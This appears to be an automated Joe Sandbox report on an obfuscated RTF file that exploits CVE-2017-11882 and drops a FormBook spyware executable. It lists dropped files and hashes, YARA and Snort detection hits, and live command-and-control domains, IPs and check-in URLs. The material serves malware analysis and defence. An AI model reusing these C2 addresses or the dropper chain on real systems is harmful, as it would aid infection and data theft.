          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf43%VirustotalBrowse
          SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf22%ReversingLabsDocument-RTF.Trojan.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp100%AviraEXP/CVE-2017-11882.Gen
          C:\Users\user\AppData\Local\Temp\Client.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\Client.exe24%ReversingLabsByteCode-MSIL.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.0.notepad.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.notepad.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.lundadonate.xyz/nb30/1%VirustotalBrowse
          www.lundadonate.xyz/nb30/100%Avira URL Cloudmalware
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.best-boy.net/nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW20%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          http://www.thegoldencamel.online/nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW20%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          thegoldencamel.online
          		66.235.200.170
          		truetrue
            		unknown
            www.best-boy.net
            		104.167.67.175
            		truetrue
              		unknown
              www.thegoldencamel.online
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                www.lundadonate.xyz/nb30/true
                • 1%, Virustotal, Browse
                • Avira URL Cloud: malware
                		low
                http://www.best-boy.net/nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2true
                • Avira URL Cloud: safe
                		unknown
                http://www.thegoldencamel.online/nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2true
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.windows.com/pctv.explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                  		high
                  http://investor.msn.comexplorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                    		high
                    http://www.msnbc.com/news/ticker.txtexplorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                      		high
                      http://wellformedweb.org/CommentAPI/explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.piriform.com/ccleanerpexplorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://www.iis.fhg.de/audioPAexplorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.piriform.com/ccleanerqexplorer.exe, 0000000A.00000000.1004860034.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.988141924.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://www.piriform.com/ccleaner1SPS0explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.hotmail.com/oeexplorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                              		high
                              http://treyresearch.netexplorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                		high
                                http://java.sun.comexplorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.icra.org/vocabulary/.explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                  		high
                                  http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000A.00000000.996446358.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011537608.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995286555.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996486805.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980535513.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://investor.msn.com/explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      http://www.piriform.com/ccleanerexplorer.exe, 0000000A.00000000.979092097.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        http://computername/printers/printername/.printerexplorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://www.%s.comPAexplorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		low
                                        http://www.autoitscript.com/autoit3explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://support.mozilla.orgexplorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.piriform.com/ccleanervexplorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1007082449.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.991189675.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1032583619.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameClient.exe, 00000006.00000002.951081960.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://servername/isapibackend.dllexplorer.exe, 0000000A.00000000.973857047.0000000006450000.00000002.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		low

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.167.67.175
                                                		www.best-boy.netUnited States
                                                		22552ESITEDUStrue
                                                66.235.200.170
                                                		thegoldencamel.onlineUnited States
                                                		13335CLOUDFLARENETUStrue

                                                General Information

                                                Joe Sandbox Version:35.0.0 Citrine
                                                Analysis ID:680528
                                                Start date and time: 08/08/202218:37:102022-08-08 18:37:10 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 33s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912 (renamed file extension from 19912 to rtf)
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                Number of analysed new started processes analysed:14
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winRTF@11/9@2/2
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 15% (good quality ratio 13.8%)
                                                • Quality average: 66.8%
                                                • Quality standard deviation: 30.4%
                                                HCA Information:
                                                • Successful, ratio: 76%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Scroll down
                                                • Close Viewer

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                18:38:17API Interceptor28x Sleep call for process: EQNEDT32.EXE modified
                                                18:38:18API Interceptor179x Sleep call for process: Client.exe modified
                                                18:38:41API Interceptor5x Sleep call for process: notepad.exe modified
                                                18:39:25API Interceptor201x Sleep call for process: ipconfig.exe modified
                                                18:39:56API Interceptor1x Sleep call for process: explorer.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASNs

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):968192
                                                Entropy (8bit):7.221905189702602
                                                Encrypted:false
                                                SSDEEP:12288:924dTkV9VXtdGI1HNDT5wQjG6EXPGc/16/PxuepSxmwCD8ik:Ts9RauHN/5wa8/L9UueAxmfHk
                                                MD5:BE1CF0179CC129FE5BA102A5EFFA515E
                                                SHA1:4A0468FAB21F7C2054F728530E9502C294B92356
                                                SHA-256:64249AF03BFA82B6DA362EAF94864CF4698BECD35869586F43101E62D1B706AF
                                                SHA-512:FF189C9764C3AF8AA4F33F268F0B50FBFA6E4A938F1F8059BFDF60D1409029CBDEBC1D926E4AEF1BA5F616B87BB5D62FD07A175481BD9F87BB6BF58E27394FA8
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, Author: John Davison
                                                • Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, Author: ReversingLabs
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Reputation:low
                                                Preview:......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................]...\........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5E27A50A-FBC0-4F18-B35D-48F0F2347081}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):0.05390218305374581
                                                Encrypted:false
                                                SSDEEP:3:ol3lYdn:4Wn
                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FD7AAECA-23CD-402D-9C50-48A29A5112A1}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):1.1722028273607172
                                                Encrypted:false
                                                SSDEEP:6:beKNc1ElClXiKNgREqAWlgFJYm7KmrRmvlw5Fr+ur8FrK:beOc1MClXiOk5uFJd5Rmvq5ZP8ZK
                                                MD5:75FCAEF5B6C0ADE6AF66F49874853C6A
                                                SHA1:834FA72EEF104773D7052895798FED035EF01594
                                                SHA-256:01E456476480AA1FD27ACF8F02AEA30D9B09581579A029154A6CD2A6850C85A0
                                                SHA-512:5E7DBBEB9534660466B7ACD9E70725504C33CC435C08D30ECE035B7CC13F5DC8AAB73F8CA16AA562697063059FEC3C5EE8258F108EB68C8B1071DD381FEDB99A
                                                Malicious:false
                                                Preview:..).(.).(.).(.).(.).(.).5.=....... .P.a.c.k.a.g.e.E.M.B.E.D.5.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D..........................................................................................................................................................................................................................................................................................................................................................................................................................................."...<...>...@...F............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J.....j....CJ..OJ..QJ..U..^J...<..CJ..OJ..QJ..^J...OJ..QJ..^J.

                                                C:\Users\user\AppData\Local\Temp\Client.exe

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):954368
                                                Entropy (8bit):7.255862647028007
                                                Encrypted:false
                                                SSDEEP:12288:f24dTkV9VXtdGI1HNDT5wQjG6EXPGc/16/PxuepSxmwCD8ik:hs9RauHN/5wa8/L9UueAxmfHk
                                                MD5:B4F00BB75BFD5C4E2C9D0CD6070E8E54
                                                SHA1:EE56EAF9288D5315D51E23C32CD8B11CEFA15E2F
                                                SHA-256:40A539EBB55B0A6A2F1529A733EAF3AA1C48CE467EAEAAA56C851ABF9BDA3006
                                                SHA-512:8CBC3FCF0AD0B985BBA9D489278FB4E8A40F56561B1FFDE8EB8D79EB9E29C0BC224123B209844EB4E3CD758BCBF0FF17FDCAD98D44E7E602F42D6DA2D0541F5C
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 24%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.........."...0..|...............@... ....@.. ....................... ............@.....................................K....................................................................................................@..H...........5++..8$ ..... ......................@....text....y...@...z.................. ..`.rsrc...............................@..@.................................... ..`.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\Client.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:gAWY3n:qY3n
                                                MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                Malicious:true
                                                Preview:[ZoneTransfer]..ZoneId=3..

                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.LNK

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 9 00:38:02 2022, mtime=Tue Aug 9 00:38:02 2022, atime=Tue Aug 9 00:38:12 2022, length=2870044, window=hide
                                                Category:dropped
                                                Size (bytes):1199
                                                Entropy (8bit):4.599606484788339
                                                Encrypted:false
                                                SSDEEP:24:8BA/XTRKJive0lNHCn9DJeAHCn9tDv3qm1u7D:8BA/XT0iflNHCnJJbHCnmg0D
                                                MD5:FB70B386249D4133C4BAB75CDA40C2F0
                                                SHA1:6EA10AEB53EB1DA991622FD5A9D03AB1A3E989F3
                                                SHA-256:099321B7080DB54AF4916A8A2E456643BAC0B512835E3F3DDFD91125804F3321
                                                SHA-512:F2B59A978A17D42544839F66970F24A64B65EC2EA6F3C7223E12D2413F0D12E56818A272FFAED073173CCB2A9582901018AE6438FEDCB64C26CFB7DD68C27EF8
                                                Malicious:false
                                                Preview:L..................F.... ...................-.......+..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1......U....Desktop.d......QK.X.U..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2...+..U.. .SECURI~1.RTF..........U...U..*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.9.0.5...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\980108\Users.user\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf.J.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.9.0.5...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S

                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):146
                                                Entropy (8bit):4.9658261704362445
                                                Encrypted:false
                                                SSDEEP:3:bDuMJluscbcTLqjQWC0LUZAlmxW9rbcTLqjQWC0LUZAlv:bCVwTeS0LHjrwTeS0LH1
                                                MD5:E9FAD3CF5FB87FFCDE0A5322116B439E
                                                SHA1:3FD3EC2D5452FE415C4FB88E3A4362C4F9717D71
                                                SHA-256:811BCE8DBC32271417CC1D639AE63C548BF7641ED1CF3F64531213A332A0C4D5
                                                SHA-512:B49BFBC8009820B9C8B209C7D112A55F1CC30C44D49B14CC1EC748EB1A6AAAB2C588F77E8D38E5475B7E67748E8EE43F8E610800953D1A495B24060144278469
                                                Malicious:false
                                                Preview:[folders]..Templates.LNK=0..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.LNK=0..[misc]..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.LNK=0..

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707525
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                                MD5:7CFA404FD881AF8DF49EA584FE153C61
                                                SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                                SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                                SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

                                                C:\Users\user\Desktop\~$curiteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707525
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                                MD5:7CFA404FD881AF8DF49EA584FE153C61
                                                SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                                SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                                SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

                                                Static File Info

                                                General

                                                File type:Rich Text Format data, version 1, unknown character set
                                                Entropy (8bit):4.770913997735828
                                                TrID:
                                                • Rich Text Format (5005/1) 55.56%
                                                • Rich Text Format (4004/1) 44.44%
                                                File name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf
                                                File size:2870044
                                                MD5:8bfea104ae681494896379e3c647f6ae
                                                SHA1:aaf97d8a987c5060ff06c4031030000d53d3cb31
                                                SHA256:2975edb12c8e70b56a89c7fb82e4eb347b992b4147dcfa2a20efd16d54c33eb4
                                                SHA512:4803dad9f9afaec9270e2d831de98152fa7307e86114f2d03b950e5486495f7bba97cb0752e13be9ac99756942c219975082b6b6f7877f8e4e3f15bd8403dc9d
                                                SSDEEP:24576:999sNt+S9dUJrMbKlvqr/OwJJZ5ic4Uez5NwoQu37WBQ3a95HX:Y
                                                TLSH:CCD5A570B1B535C6E26F0172429FBC59521738C3B3C62D88815DEAF62ED4B7A7B41A0E
                                                File Content Preview:{\rtf1{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang {\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang {\pntxta )}}{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\*\pnseclvl6.\pnlcltr\pnstart1\pnindent720\pnhang {\pnt

                                                File Icon

                                                Icon Hash:e4eea2aaa4b4b4a4

                                                Static RTF Info

                                                Objects

                                                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                0000012A7h2embeddedPackage954535Client.exeC:\Path\Client.exeC:\Path\Client.exeno
                                                1001DC2BCh2embeddedEquation.33072no

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                192.168.2.2266.235.200.17049171802031449 08/08/22-18:39:45.738853TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2266.235.200.170
                                                192.168.2.22104.167.67.17549172802031449 08/08/22-18:40:04.832440TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.22104.167.67.175
                                                192.168.2.2266.235.200.17049171802031453 08/08/22-18:39:45.738853TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2266.235.200.170
                                                192.168.2.22104.167.67.17549172802031453 08/08/22-18:40:04.832440TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.22104.167.67.175
                                                192.168.2.2266.235.200.17049171802031412 08/08/22-18:39:45.738853TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2266.235.200.170
                                                192.168.2.22104.167.67.17549172802031412 08/08/22-18:40:04.832440TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.22104.167.67.175

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 8, 2022 18:39:45.721043110 CEST4917180192.168.2.2266.235.200.170
                                                Aug 8, 2022 18:39:45.738465071 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:45.738708019 CEST4917180192.168.2.2266.235.200.170
